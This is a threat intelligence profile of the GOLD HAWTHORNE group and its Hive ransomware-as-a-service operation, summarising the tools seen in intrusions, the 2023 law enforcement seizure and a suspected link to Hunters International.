GOLD HAWTHORNE

GOLD HAWTHORNE is a financially motivated threat group responsible for development and distribution of the Hive ransomware. Since June 2021, Hive was used in post-intrusion ransomware attacks incorporating 'name-and-shame' data theft tactics. GOLD HAWTHORNE operated Hive as a ransomware-as-a-service (RaaS), using affiliates to gain access to victim networks and deploy the ransomware. Hive ransomware intrusions have been characterised by the use of Cobalt Strike, SystemBC, Metasploit, and a number of legitimate tools including ProcDump, PCHunter64, GMER and the Ntdsutil utility.

CTU researchers have observed Hive distributed using techniques previously associated with GOLD ULRICK Ryuk and Conti intrusions, such as the use of PsExec and a copy.bat batch script, WMI, BITSAdmin, and tool staging in a C:\Share$ directory on compromised domain controllers. This behavior could mean that GOLD ULRICK or one of its affiliates was using Hive. Alternatively, GOLD HAWTHORNE affiliates may have been copying publicly documented techniques used by GOLD ULRICK.

On January 26, 2023 the U.S. Department of Justice (DoJ) and Federal Bureau of Investigation (FBI) issued a statement that described the international law enforcement cooperation that resulted in the seizure of some infrastructure associated with the Hive ransomware operation. The statement claimed that Hive ransomware had been targeted against 1,500 victims since GOLD HAWTHORNE started operating in mid-2021. This is considerably more than the 209 victims listed on its leak site, indicating that the number of victims a ransomware group chooses to name might be considerably lower than the actual number.

Later in 2023, third-party researchers identified significant similarities between Hive ransomware and a new ransomware variant used by a group calling itself Hunters international. This led to speculation that the new scheme might be rebrand of Hive, an assertion that members of Hunters International subsequently denied, claiming instead to have purchased and repurposed the source code. Although it is possible that Hunters International is a rebrand of Hive, CTU researchers track it as a different cluster of activity under the GOLD CRESCENT threat group.